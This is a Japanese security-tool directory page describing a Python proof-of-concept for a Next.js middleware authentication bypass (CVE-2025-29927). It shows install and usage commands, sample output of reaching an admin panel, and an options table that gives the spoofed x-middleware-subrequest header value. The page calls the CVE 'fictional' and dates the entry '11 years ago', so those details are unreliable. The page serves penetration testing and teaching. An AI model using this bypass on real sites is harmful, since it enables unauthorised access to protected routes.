Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
PoC-for-Next.js-Middleware — > 🔓 架空のNext.jsミドルウェアバイパス(CVE-2025-29927)の概念実証 — 保護されたルートをテストするためのサブリクエストを作成します。 | Kitploit
ツール/GitHubGitHub/m2hcz/poc-for-next.js-middleware
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubm2hcz/poc-for-next.js-middleware

PoC-for-Next.js-Middleware

> 🔓 架空のNext.jsミドルウェアバイパス(CVE-2025-29927)の概念実証 — 保護されたルートをテストするためのサブリクエストを作成します。

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Next.js ミドルウェアバイパスのPoC (CVE-2025-29927)

Python Version Status

これは、架空のNext.jsミドルウェアバイパスの脆弱性(CVE-2025-29927)に対する概念実証です。教育目的および許可されたセキュリティ研究にのみ使用してください。


🚀 機能

機能説明
✨ カラー&詳細表示色分けされた出力;詳細なデバッグログは -v を使用。
📦 OOP構造クラスベース設計で明瞭かつ保守性向上。
🌐 プロキシサポート--proxy でHTTP(S)プロキシ経由のトラフィックルーティング。
🍪 セッション処理Cookieと接続再利用のための永続的な requests.Session。
🚦 リダイレクト制御デフォルトでリダイレクトを追跡せず、通過/失敗を明確に検出。
🛠 カスタムヘッダーUser-Agent、x-middleware-subrequest の上書き、またはヘッダーの追加。

⚡ インストール

root@kitploit:~
# Clone repository
git clone https://github.com/your-username/nextjs-middleware-poc.git
cd nextjs-middleware-poc

# (Optional) Create virtual environment
python3 -m venv .venv
source .venv/bin/activate

# Install dependencies
pip install -r requirements.txt

必要要件 Python 3.7+


🎯 使用方法

root@kitploit:~
python poc.py [options] <host>[:port]

🔍 例

1. 基本テスト

root@kitploit:~
python poc.py localhost:3000

2. HTTPSとカスタムパス

root@kitploit:~
python poc.py example.com -s https -p /dashboard

3. プロキシと詳細出力

root@kitploit:~
python poc.py internal-app:8080 --proxy http://127.0.0.1:8080 -v

✅ 期待される出力

成功

root@kitploit:~
[*] Target URL: http://localhost:3000/admin
[+] SUCCESS: Middleware bypassed — access granted!
--- Response Snippet ---
<!DOCTYPE html><html>…<title>Admin Panel</title>…

失敗

root@kitploit:~
[*] Target URL: http://localhost:3000/admin
[-] FAIL: Access denied by middleware (302 Redirect)

ツールをダウンロード
オプション説明
-p, --path PATH保護ルートパス (デフォルト: /admin)
-s, --scheme {http,https}プロトコル (デフォルト: http)
--header HEADERx-middleware-subrequest ヘッダー値 (デフォルト: middleware:middleware)
-ua, --user-agent AGENTカスタム User-Agent (デフォルト: Mozilla/5.0)
--proxy PROXYHTTP(S) プロキシURL (例: http://127.0.0.1:8080)
-v, --verboseデバッグ出力を有効化
-h, --helpこのヘルプメッセージを表示